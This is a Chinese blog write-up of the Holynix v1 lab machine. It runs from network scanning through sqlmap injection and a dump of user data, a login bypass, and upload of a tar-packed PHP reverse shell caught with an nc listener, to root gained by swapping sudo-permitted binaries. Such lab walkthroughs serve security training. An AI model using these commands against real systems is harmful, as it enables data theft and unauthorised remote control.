当前位置: 首页 > article >正文

Holynix: v1

article 2024/9/20 13:51:43

确认物理地址

00:0C:29:BC:05:DE

ip扫描

arp-scan -l

端口扫描

nmap 192.168.48.167

访问一下80端口

burp抓包

找到一个登录框

想着burp抓包试试

将抓到的包放入kali中的文件中使用sqlmap注入试试

sqlmap

存在sql注入

sqlmap -r password --batch --random-agent

发现存在sql注入,可使用万能密码登录

利用--dump命令打印出用户信息

sqlmap -r passwd --batch --random-agent --dump

文件上传

登录发现有文件上传功能点,默认万能密码登录是第一个用户,发现不能上传,我们切换第二个用户

来到upload页面,我们上传一个webshell文件

来到用户目录下

/~etenenbaum点击上传的文件发现没有解析

我们想起来了上面勾选的那个自动解压按钮,利用kali自带的webshell并将其压缩

find / -type f -name "php*reverse*"
cp /usr/share/webshells/php/php-reverse-shell.php ./
vim /php-reverseoshell.php   #修改为kali  ip
tar -czf php.tar.gz php-reverse-shell.php

上传

发现自动解压了

反弹shell

kali开启监听(我这里没有修改端口默认的)双击执行php文件反弹得到shell

nc -lvvp 8888

提权

sudo -l 提权

sudo mv /bin/tar /bin/tar.bak
sudo mv /bin/su /bin/tar
sudo tar

提权成功


http://www.kler.cn/news/310092.html

相关文章:

  • 基于SSM的在线家用电器销售系统
  • 【ARM】Trustzone和安全架构
  • [SDX35+WCN6856]SDX35 + WCN6856 WiFi导致系统crash问题分析及解决方案
  • (娱乐)魔改浏览器-任务栏图标右上角加提示徽章
  • 线性链条件随机场(Linear Chain Conditional Random Field)-有监督学习方法、概率模型、生成模型、对数线性模型、参数化模型
  • 力扣(LeetCode)每日一题 1184. 公交站间的距离
  • 前后端分离Vue美容店会员信息管理系统o7grs
  • Java-使用反射来处理对象,并构建新的JSON数据结构
  • 换个手机IP地址是不是不一样?
  • spring boot admin集成,springboot2.x集成监控
  • .net core8 使用JWT鉴权(附当前源码)
  • Python 之数据库操作(Python Database Operations)
  • Linux(ubuntu)(c语言程序)
  • C++(C++的文件I/O)
  • nanoGPT用红楼梦数据从头训练babyGPT-12.32M实现任意问答
  • Redis 5.0.4 安装教程
  • NFT Insider #147:Sandbox 人物化身九月奖励上线;Catizen 付费用户突破百万
  • PDF转图片的思路思考
  • Leetcode—环形链表||
  • 脚本基本规则
  • C++:日期类的实现
  • java 递归读取前10个匹配的文件所在的全路径
  • 松散绑定是什么?
  • 切换淘宝最新镜像源:优化NPM包管理的极致体验
  • windows C++ 并行编程-异步消息块(一)
  • 【系统架构设计师-2016年真题】案例分析-答案及详解
  • Java从入门到精通学习框架(三)
  • Mybatis+Druid+MybatisPlus多数据源配置
  • 闲鱼网页版开放,爬虫的难度指数级降低。
  • LDD学习启程(TODO)